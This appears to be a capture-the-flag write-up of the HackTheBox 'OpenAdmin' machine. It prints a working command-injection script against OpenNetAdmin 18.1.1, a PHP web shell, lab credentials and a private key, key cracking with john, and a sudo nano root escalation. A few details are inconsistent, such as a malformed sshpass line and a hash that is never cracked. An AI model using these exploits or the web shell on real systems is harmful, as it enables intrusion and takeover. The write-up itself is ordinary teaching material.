I"d<blockquote>
  <p><strong>The information provided in this site is for educational purposes regarding pentesting. The author of the site will not be held any responsibility for any misuse of the information from this site.</strong></p>
</blockquote>

<h2 id="summary"><strong><span style="color:#ff5555">Summary</span></strong></h2>
<hr />

<ul>
  <li>Find the OpenNetAdmin page and use a remote code execution exploit to get access to user <code class="language-plaintext highlighter-rouge">www-data</code></li>
  <li>The DB credentials from the OpenNetAdmin configuration file are re-used for SSH access as user <code class="language-plaintext highlighter-rouge">jimmy</code></li>
  <li>Find another internal website running and get a SHA512 hash from the PHP code</li>
  <li>After cracking the hash, log into the application and find an encrypted <code class="language-plaintext highlighter-rouge">SSH</code> private key</li>
  <li>Crack the key and then log in a user <code class="language-plaintext highlighter-rouge">joanna</code> and get the <code class="language-plaintext highlighter-rouge">user flag</code></li>
  <li>Look at the sudo commands and find that nano can be run as <code class="language-plaintext highlighter-rouge">root</code>, look up gtfobins and spawn <code class="language-plaintext highlighter-rouge">/bin/bash</code> from nano</li>
  <li>cat the <code class="language-plaintext highlighter-rouge">/root/root.txt</code></li>
</ul>

<h2 id="port-scan"><strong><span style="color:#ff5555">Port Scan</span></strong></h2>
<hr />

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
</pre></td><td class="rouge-code"><pre>root@corshine:~# nmap -sC -sV -T4 -oA scans/nmap.full -p- -v  openadmin.htb
# Nmap 7.80 scan initiated Fri May  1 11:44:03 2020 as: nmap -sC -sV -T4 -oA scans/nmap.full -p- -v  openadmin.htb
Nmap scan report for openadmin.htb (10.10.10.171)
Host is up (0.27s latency).
Not shown: 65510 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp    open     http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Only two ports are opened <code class="language-plaintext highlighter-rouge">22:ssh</code> and <code class="language-plaintext highlighter-rouge">80:http</code>. So we just need to focus on port <code class="language-plaintext highlighter-rouge">80</code>.</p>

<h2 id="port-80"><strong><span style="color:#ff5555">Port 80</span></strong></h2>
<hr />
<p>We try to visit the website on port <code class="language-plaintext highlighter-rouge">80</code>, we found <code class="language-plaintext highlighter-rouge">apache2 default page</code>.</p>

<p><img src="/images/htb/openadmin/defaultapache.png" alt="" /></p>

<h2 id="gobuster"><strong><span style="color:#ff5555">Gobuster</span></strong></h2>
<hr />
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre></td><td class="rouge-code"><pre>root@corshine:~# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -k   -x "txt,html,php,asp,aspx,jpg" -u http://openadmin.htb              
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://openadmin.htb
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt,html,php,asp,aspx,jpg
[+] Follow Redir:   true
[+] Timeout:        10s
===============================================================
2020/05/01 17:35:23 Starting gobuster
===============================================================
/index.html (Status: 200)
/music (Status: 200)
/artwork (Status: 200)
</pre></td></tr></tbody></table></code></pre></div></div>
<p>I got two <code class="language-plaintext highlighter-rouge">directories</code> called music and network and found that <code class="language-plaintext highlighter-rouge">/ona</code> directory inside <code class="language-plaintext highlighter-rouge">/music</code> directory which mention the version of the portal. The title page is <code class="language-plaintext highlighter-rouge">OpenNetadmin</code> and the version is <code class="language-plaintext highlighter-rouge">18.1.1</code>.</p>

<p><img src="/images/htb/openadmin/onadir.png" alt="" /></p>

<h2 id="exploiting-the-admin-portal"><strong><span style="color:#ff5555">Exploiting the admin portal</span></strong></h2>
<hr />

<p>There is exploit available for the current version on <code class="language-plaintext highlighter-rouge">exploit-db</code>.</p>

<p><img src="/images/htb/openadmin/exploit1.png" alt="" /></p>

<p><a href="https://www.exploit-db.com/exploits/47691">OpenNetadmin-Exploit</a></p>

<p>We just copy the <code class="language-plaintext highlighter-rouge">exploit</code> and modify it a bit.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre>#!/bin/bash

URL="http://openadmin.htb/ona/"
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&amp;xajaxr=1574117726710&amp;xajaxargs[]=tooltips&amp;xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&amp;xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Now its time to run the script…..</p>

<h2 id="www-data"><strong><span style="color:#ff5555">www-data</span></strong></h2>
<hr />
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre>root@corshine:~# ./exploit.sh 
$ whoami
www-data
$ hostname
openadmin
$
</pre></td></tr></tbody></table></code></pre></div></div>
<p>After few minutes of enumeration, I found a file called <code class="language-plaintext highlighter-rouge">database_settings.inc.php</code> in <code class="language-plaintext highlighter-rouge">local/config</code></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre>$ ls local/config
database_settings.inc.php
motd.txt.example
run_installer
$
</pre></td></tr></tbody></table></code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
</pre></td><td class="rouge-code"><pre>$ cat local/config/database_settings.inc.php
&lt;?php

$ona_contexts=array (
  'DEFAULT' =&gt; 
  array (
    'databases' =&gt; 
    array (
      0 =&gt; 
      array (
        'db_type' =&gt; 'mysqli',
        'db_host' =&gt; 'localhost',
        'db_login' =&gt; 'ona_sys',
        'db_passwd' =&gt; 'n1nj4W4rri0R!',
        'db_database' =&gt; 'ona_default',
        'db_debug' =&gt; false,
      ),
    ),
    'description' =&gt; 'Default data context',
    'context_color' =&gt; '#D3DBFF',
  ),
);
</pre></td></tr></tbody></table></code></pre></div></div>

<p>We have a password <code class="language-plaintext highlighter-rouge">n1nj4W4rri0R!</code>, maybe its for user, and also we found that there are two users in this machine.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre>$ ls -la /home
total 16
drwxr-xr-x  4 root   root   4096 Nov 22 18:00 .
drwxr-xr-x 24 root   root   4096 Nov 21 13:41 ..
drwxr-x---  5 jimmy  jimmy  4096 Nov 22 23:15 jimmy
drwxr-x---  6 joanna joanna 4096 Nov 28 09:37 joanna
$ 
</pre></td></tr></tbody></table></code></pre></div></div>

<p>We try to ssh with user <code class="language-plaintext highlighter-rouge">jimmy</code> by loggin in to <code class="language-plaintext highlighter-rouge">ssh</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
</pre></td><td class="rouge-code"><pre>root@corshine:~# sshpass -p 'n1nj4W4rri0R!` jimmy@openadmin.htb
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri May  1 13:17:15 UTC 2020

  System load:  0.0               Processes:             124
  Usage of /:   49.9% of 7.81GB   Users logged in:       2
  Memory usage: 21%               IP address for ens160: 10.10.10.171
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri May  1 10:59:39 2020 from 10.10.16.81
jimmy@openadmin:~$ 
</pre></td></tr></tbody></table></code></pre></div></div>
<p>And we are as jimmy now but we can’t find <code class="language-plaintext highlighter-rouge">user.txt</code>, after few minutes looking around, I found that I’m not in the proper user.</p>

<h2 id="escalating-to-joanna"><strong><span style="color:#ff5555">Escalating to Joanna</span></strong></h2>
<hr />

<p>After various enumerations, I found a dir called <code class="language-plaintext highlighter-rouge">internal</code> in /var/www/ and there is high port <code class="language-plaintext highlighter-rouge">52846</code> running locally.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>LISTEN             0                   128                                   127.0.0.1:52846  
</pre></td></tr></tbody></table></code></pre></div></div>
<p>We tried to make a request to the <code class="language-plaintext highlighter-rouge">127.0.0.1:52846</code> using curl since it is already installed in the machine.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
</pre></td><td class="rouge-code"><pre>jimmy@openadmin:~$ curl 127.0.0.1:52846

&lt;?
   // error_reporting(E_ALL);
   // ini_set("display_errors", 1);
?&gt;

&lt;html lang = "en"&gt;

   &lt;head&gt;
      &lt;title&gt;Tutorialspoint.com&lt;/title&gt;
      &lt;link href = "css/bootstrap.min.css" rel = "stylesheet"&gt;

      &lt;style&gt;
         body {
            padding-top: 40px;
            padding-bottom: 40px;
            background-color: #ADABAB;
         }

         .form-signin {
            max-width: 330px;
            padding: 15px;
            margin: 0 auto;
            color: #017572;
         }

         .form-signin .form-signin-heading,
         .form-signin .checkbox {
            margin-bottom: 10px;
         }

         .form-signin .checkbox {
            font-weight: normal;
         }

         .form-signin .form-control {
            position: relative;
            height: auto;
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
            padding: 10px;
            font-size: 16px;
         }

         .form-signin .form-control:focus {
            z-index: 2;
         }

         .form-signin input[type="email"] {
            margin-bottom: -1px;
            border-bottom-right-radius: 0;
            border-bottom-left-radius: 0;
            border-color:#017572;
         }

         .form-signin input[type="password"] {
            margin-bottom: 10px;
            border-top-left-radius: 0;
            border-top-right-radius: 0;
            border-color:#017572;
         }

         h2{
            text-align: center;
            color: #017572;
         }
      &lt;/style&gt;

   &lt;/head&gt;
   &lt;body&gt;

      &lt;h2&gt;Enter Username and Password&lt;/h2&gt;
      &lt;div class = "container form-signin"&gt;
        &lt;h2 class="featurette-heading"&gt;Login Restricted.&lt;span class="text-muted"&gt;&lt;/span&gt;&lt;/h2&gt;
                &lt;/div&gt; &lt;!-- /container --&gt;

      &lt;div class = "container"&gt;

         &lt;form class = "form-signin" role = "form"
            action = "/index.php" method = "post"&gt;
            &lt;h4 class = "form-signin-heading"&gt;&lt;/h4&gt;
            &lt;input type = "text" class = "form-control"
               name = "username"
               required autofocus&gt;&lt;/br&gt;
            &lt;input type = "password" class = "form-control"
               name = "password" required&gt;
            &lt;button class = "btn btn-lg btn-primary btn-block" type = "submit"
               name = "login"&gt;Login&lt;/button&gt;
         &lt;/form&gt;

      &lt;/div&gt;

   &lt;/body&gt;
&lt;/html&gt;
</pre></td></tr></tbody></table></code></pre></div></div>

<p>The file that being displayed and executed at the same time in <code class="language-plaintext highlighter-rouge">/index.php</code> from the directory <code class="language-plaintext highlighter-rouge">/var/www/internal</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre>jimmy@openadmin:/var/www/internal$ ls -la
total 20
drwxrwx--- 2 jimmy internal 4096 May  1 13:26 .
drwxr-xr-x 4 root  root     4096 Nov 22 18:15 ..
-rwxrwxr-x 1 jimmy internal 3229 Nov 22 23:24 index.php
-rwxrwxr-x 1 jimmy internal  185 Nov 23 16:37 logout.php
-rwxrwxr-x 1 jimmy internal  339 Nov 23 17:40 main.php
</pre></td></tr></tbody></table></code></pre></div></div>
<p>I have read and write permissions in the dir <code class="language-plaintext highlighter-rouge">internal</code> so I can create <code class="language-plaintext highlighter-rouge">php</code> file that may execute my commands as in <code class="language-plaintext highlighter-rouge">cmd=param</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>&lt;?php echo "&lt;pre&gt;"; system($_GET['cmd']); ?&gt;
</pre></td></tr></tbody></table></code></pre></div></div>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>jimmy@openadmin:/var/www/internal$ echo '&lt;?php echo "&lt;pre&gt;"; system($_GET['cmd']); ?&gt;' &gt;&gt; test.php
jimmy@openadmin:/var/www/internal$ curl 127.0.0.1:52846/test.php?cmd=whoami

&lt;pre&gt;joanna
</pre></td></tr></tbody></table></code></pre></div></div>
<p>We confirmed that the service is running as user <code class="language-plaintext highlighter-rouge">joanna</code></p>

<h2 id="grabbing-the-id_rsa"><strong><span style="color:#ff5555">Grabbing the id_rsa</span></strong></h2>
<hr />

<p>The content of the file <code class="language-plaintext highlighter-rouge">main.php</code> is</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre>&lt;?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "&lt;pre&gt;$output&lt;/pre&gt;";
?&gt;
&lt;html&gt;
&lt;h3&gt;Don't forget your "ninja" password&lt;/h3&gt;
Click here to logout &lt;a href="logout.php" tite = "Logout"&gt;Session
&lt;/html&gt;
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Make a <code class="language-plaintext highlighter-rouge">request</code> to <strong>main.php</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
</pre></td><td class="rouge-code"><pre>jimmy@openadmin:/var/www/internal$ curl 127.0.0.1:52846/main.php
&lt;pre&gt;-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----
&lt;/pre&gt;&lt;html&gt;
&lt;h3&gt;Don't forget your "ninja" password&lt;/h3&gt;
Click here to logout &lt;a href="logout.php" tite = "Logout"&gt;Session
&lt;/html&gt;
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Now we have the encrypted <code class="language-plaintext highlighter-rouge">private ssh keys</code>.</p>

<h2 id="crack-the-private-key"><strong><span style="color:#ff5555">Crack the private-key</span></strong></h2>
<hr />

<p>First we have to make a crackable with john by using <code class="language-plaintext highlighter-rouge">ssh2john.py</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>root@corshine:~# python2 /usr/share/john/ssh2john.py joanna_rsa &gt;&gt; hash-id_rsa
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Now we can crack it with <code class="language-plaintext highlighter-rouge">john</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td><td class="rouge-code"><pre>root@corshine:~# john hash-id_rsa -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas      (joanna-id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:07 DONE (2020-05-03 20:14) 0.1194g/s 1967Kp/s 1267Kc/s 1267KC/sa6_123..*7¡Vamos!
Session completed
</pre></td></tr></tbody></table></code></pre></div></div>
<p>We have <code class="language-plaintext highlighter-rouge">bloodninjas</code> as the cracked <strong>passphrase</strong></p>

<p>Now it is time to login using the key of <code class="language-plaintext highlighter-rouge">joanna</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre>root@corshine:~# chmod 600 joanna_rsa
root@corshine:~# ssh -i joanna-id_rsa joanna@openadmin.htb
Enter passphrase for key 'joanna-id_rsa': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

Last login: Fri May  1 11:31:30 2020 from 10.10.16.81
joanna@openadmin:~$ 
</pre></td></tr></tbody></table></code></pre></div></div>

<p>And we are in as <code class="language-plaintext highlighter-rouge">joanna</code></p>

<p><img src="/images/htb/openadmin/usertxt.png" alt="" /></p>

<h2 id="escalating-to-root"><strong><span style="color:#ff5555">Escalating to root</span></strong></h2>
<hr />

<p>By checking simple command <code class="language-plaintext highlighter-rouge">sudo -l</code> to check if I can run any command as <strong>root</strong>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre>joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv
</pre></td></tr></tbody></table></code></pre></div></div>

<p>We can edit the file on <code class="language-plaintext highlighter-rouge">/opt/priv</code> using nano as <strong>root</strong>.</p>

<p>I tried to search for <code class="language-plaintext highlighter-rouge">nano</code> on <a href="https://gtfobins.github.io/gtfobins/nano/">GTFOBINS</a></p>

<p>Open the file on <code class="language-plaintext highlighter-rouge">/opt/priv</code> in <strong>nano</strong> as <strong>root</strong> with <code class="language-plaintext highlighter-rouge">sudo</code>, and press <code class="language-plaintext highlighter-rouge">ctrl+r and then ctrl+x</code> to run commands.</p>

<p>I found multiple ways to get root, but I used <code class="language-plaintext highlighter-rouge">cat</code> to print <strong>root.txt</strong></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>joanna@openadmin:~$ sudo nano /opt/priv
</pre></td></tr></tbody></table></code></pre></div></div>

<p><img src="/images/htb/openadmin/root1.png" alt="" /></p>

<p><img src="/images/htb/openadmin/root2.png" alt="" /></p>

<hr />

<p><img src="/images/mandatory/pwned.png" alt="" /></p>
:ET